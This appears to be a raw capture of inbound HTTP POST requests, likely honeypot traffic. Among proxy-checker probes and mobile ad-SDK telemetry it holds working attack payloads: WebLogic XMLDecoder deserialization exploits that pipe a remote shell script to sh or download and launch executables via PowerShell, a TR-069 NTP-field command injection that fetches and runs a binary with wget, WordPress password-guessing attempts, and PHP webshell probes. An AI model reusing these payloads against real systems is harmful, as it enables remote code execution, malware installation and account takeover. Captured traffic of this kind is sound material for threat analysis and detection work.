Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://check.proxyradar.com/azenv.php?auth=149522191151&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://check.proxyradar.com/azenv.php?auth=149653732197&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
RvRXlI/JbTUdHwro6JxrPxh65dOpZ/aSZWjHMLht7wiMRDcw//2ZlAZgVDhrNmgwTCkZSG2rm9Qr4pFxLzEVK12yHnJPI9wuHyYaF2uvrAUQcoQGj8LhSu1dpYjVwVbtuKVJexINePsMuaHcTDHOiqdOOHTEnSrYsu8ARJQmLs+JvJam0d4UrCwgq6hEl+qfsGh0otWRUE8Q6D0lCUBJnaNCvlRYwEMr+gE+Ed8tuWyQe7l84D0In7PafAwJ6A3XmyeQjiCtfZYaX2hVxPXV534f40LULtkvky/uqzpXdP4BvcowbIM0WSt+0VMBufkeJacPjSPYevMazNX+ZiwFxjxHQL663GKBjtm6UkiAwZHAMTs/xw62K8EanxE4zeOSXmrOQuy6zrQYb7APuhyZIsZpFYO6QD4GEkNq8M80QIYMbTU3/A==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
VQ+xzXQfANar/BLBDvX9cQARjcKzPT6X6Ah5ttB40lTV3g7Xe7BXBEmjv9sCp9e9uttbO02bbSGHLVxhhdlyfuW8DKAPzMXl/USVzrBuhK8R5biz9ArAuG8gWYbRnxHXJuj7M82Vc+4v9ooAL4CwWbNRGj+h7ARN1CqqNngARLlkRC0EYJiD7QyC3BCVWu15IaWm0xlIZJYmJ7njGYK50d/gC31qqhh+oitt1/B408E+zIpD3hKY4/dQDI6RysJrtbKBuhNSf2MR7g1U2vE92kn2aquaIShgTLTVMDviT9C7pRQvlMotTI4Ip8o5GoEySKnyaovSxM2SuDX/n2Mevbj7dfs8zo0TMtE4PesnbSbOwdZtRVvmVEjBUds=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache
RKRXwtzMZPYRbdTeQULkXIPTgMoZZngu8vZW3pxA5+JACY17FrRJ1uHSaIMeLS32VQp+d9Szy2N22QBA0QC87wLLxXCPielaimfN5LfCvoSa2t8sZC+xWT0Rzsu1EqUyWLYMeF3y02e4JfxX7fXjPbFTlZWW2kO5g0CYFi4m9ZmDYvuSWxtDig/e8nwbbJMeq+sfN8I5WCpGsdX3b9PLiqJjrbSQOx+wxK6YFHEezMmRl3+yj4D95Gra0eMZ7yi1EFzs77d8GJBTxx99UHNwsAXOfIU3L6u0XAEMGYNUyDr1sTrU9QwnO7otSdHShpIBB5rMObQrrEY9MCS3kitaPIOLUc+SX9rCa4rP8OW13phZlAZk3fTcW4rE6/tuw0exYsS6xy8YMtOGUA==
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
śƘ#Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÑfl%Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 809
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.best-proxies.ru/azenv.php?auth=146182398457718&a=PC&i=2733905975&p=8888 HTTP/1.1
Cookie: testCookie=true
Host: check.best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E </string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=146875038589&a=PSCMN&i=2734486398&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=172&pwd=172zxcv
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 520
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://5.8.65.5/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=789789
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åa‰ÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=admin7
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
axa=die('Hello, Peppa!');
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache
FqVZxYjJYg0hwSopzpASRObvvk2vNpg/8iFkXt8M3O7tf/q4uAzV66HIfdPrL2MiDC3q2fHeVXASHXtGUmMuDbFsFmwU4E5hgRYzYzfmWcS30jRxG75l2MZyrtcNcOzI4C2QXVwVzTVgDzwxnwtwAXGFBBfm9vAy+uGP2DDDmXAwjsCDNv97ZYG3QwAvdcV5h5mw5e56G31LPLohkP+6IIaM3HKcSoV0VcmW/SZHo9+8gYqgw0LIkXqvTjuCVaMIsUn5PgMLyY6XV+wHJFHU7FPvsE0ZsqaG0+jBvcbWPYqLoHo943jE6vhk1IpfJxpxSVL6EqhHqrUp9eZDEffxauSR5JbKVI7ubpHUJRET2g==
POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E …</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x
Content-Length: 0
Connection: Keep-Alive
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache
log=jamesatchue&pwd=jamesatchue222
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åü‰
ÎÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î™95Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 420
Cache-Control: no-cache
FKddl9qaZS8LBAdDK40Cfvqtz9utdgOh+VCe2DOv/6ifw8Z5U2HqGDbPLviPZdnf9j8WOMaUjk0/tqT7vMdZWaWaZtlMZUfQ+Dm2zgDZzsaO+o7mH1GCWIbuQYXXHtXEbcT2NjWgD9BWU//1Vt6/LB96AxFoqQcvFFEMBr7sOkpHN00vqA9mx+LlT1D5sm5u6ExJd8KeHrlpyBpdrx1p5zBtNvjD1sjmqh3fDStcbzZ+KPhjh+cPa1bp5CLu2/cCz/wvaqOUTpT9HL0CQxmjMbwIxmJxTIZi7fByEmrnm8Uu6aa9mEh0sN79hnQbed3WnkerW8RSCGuXBvk+T23gWGW16DsYHGidIiRBXbXqyjy/24SrhWD9bREHQvZLAWLTAtde6Cx04iDaGM/1T6fwocMEjmi+srT4n6gk
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÖÖ§ŒÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îp2Y›∆√«∆fl
POST http://d.applovin.com/device?device_token=MaznYs97JTiqaqEwnZGZ5hoNAbGKHRajj5FMcZF_ODHYTEi_kuVCQ4yNWoT9kVKCYOdmiOu8EBuDlBzDf9dDAcksZAxPMlyVV-CvlM0u7mEUGLyh8g8trSy-C2iSYtXpQsCRhRgeTqA7eY2q-c8xqFHgtRJiJ0jgDFMg8-H0uSU= HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 970
{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":184,"FetchNextAd_time":2884124,"SubmitData_time":487911,"RepeatSubmitData_time":360743,"RenderAd_time":1552981,"TaskDispatchPostback_time":369813,"ad_session_start":1496222733705,"FetchNextAd_count":182,"RepeatFetchNextAd_time":616015,"cached_files_expired":66,"RepeatFetchNextAd_count":24,"RepeatSubmitData_count":20,"TaskDispatchPostback_count":39,"TaskCollectAdvertisingId_time":21039,"TaskCollectAdvertisingId_count":39,"SubmitData_count":35,"RenderAd_count":68}}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache
SvAMkN7AMSAulBV0nN1Vcb2V4BQF9iQ8P2MqhHKd2IdKO0hDeUk7i0IT0W9o+rWJT6FY/lreE6pcw3QgW6nRiPa9MyoOx8YBS0l8uZV7Gl3yGyytkaNfos9sdt+2MWdM9rdpjA2Vg8Pe9+SNZjoEgWgNUZodN9X4mCSq4PX9MN7LANDeeMBjQ6l56Q7T8olC+IfvWwkn2e4KSp5wf/VR65viKyudWmPJS35lOJaP6EZv6QpWxhDlZj4aJQInR+aWpIlcz10WdRY8D4f5dNuweEfhetu28H6z9yZU1Uk75FcNnh0s1f5D3lHfH832xNVlHJXebONWMgdiDmCHTx46lihm8ZULIxdIX05SywdFIB/X95JadR6Nmjn9b7UMXgQpisdk1R7bk0skitbo+Fj+bunsHQH0r+OqmUA2DDgNV/m/pa7KDdb/l032cQ==
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST http://t7.proxy-checks.com/favicon.ico HTTP/1.1
Host: t7.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
U1PjmiERB+aFcbgO3iHb8hr3KvCmAYC983W59F8zoRM6xEKa0riJFTO2htSdDp/6VN+HVfEvREsEOEmkg+pegWxEJP6gwl+KZfEnAOxh0CdOB2C0NybqTaDKIzIsN4ZZfXso6Z7dYJZjuANYZh94caeqMGZ+bfwqGMNVEElwLtKjwFoOyCLrrPJZm3ESeblGcxKkWtrIAp57XQbsQTpLx91SLTh/KvTVsdCqe40c5yTcOEgHZRDzD9fIr7EACYZah7O5pZR/A3fG8ahveUKH/C9SAlcnNDWPAEPMr+lOH2lRYCMRa8Kp/B69PravgEN/bARYnjh9+E7J1e6zOV+wU8d96gOVHLntHOgbiekut8FNtrS9Fn79YnxhLccn7pnXnbg=
POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 483
{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","userAgent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 4LTE Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36","networkOperator":"TELKOMSEL","volume":0.4,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
BV2zyidEA1BHFAWVsa9ZZ05haFdfsHWPlefRjCHVMuhkBxNlEXptBgo0vi7vGswPBo29Xa3kb+FMvYpuqE5NaVRA02oP9AymSupZekpdOdrobZnwUClUwCwEj3RDaNkPqfg+HlGtYRH9iqoqqt6g56DptDohALe+r9q+dld/tG6YvEsZ4uAly7f0Mfr4xaKxcuHjqXZN7Ay855IkIoyqUE0FK2clOgSf+vWaHIqHbQboCgz68f7FNou8A2hI0OJFTtZ6PV9LSGbn9rcdpVvBPoLjY0zNv2AqnTT2v41NjImD30KlRhjQMuIVH5lzszcll/ktxSeHdktzmmVqe7jyaeovfu04VSKxHkfVRCgp9W9DBjl4l1wmMLLC
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST http://check.proxyradar.com/azenv.php?auth=149602520935&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
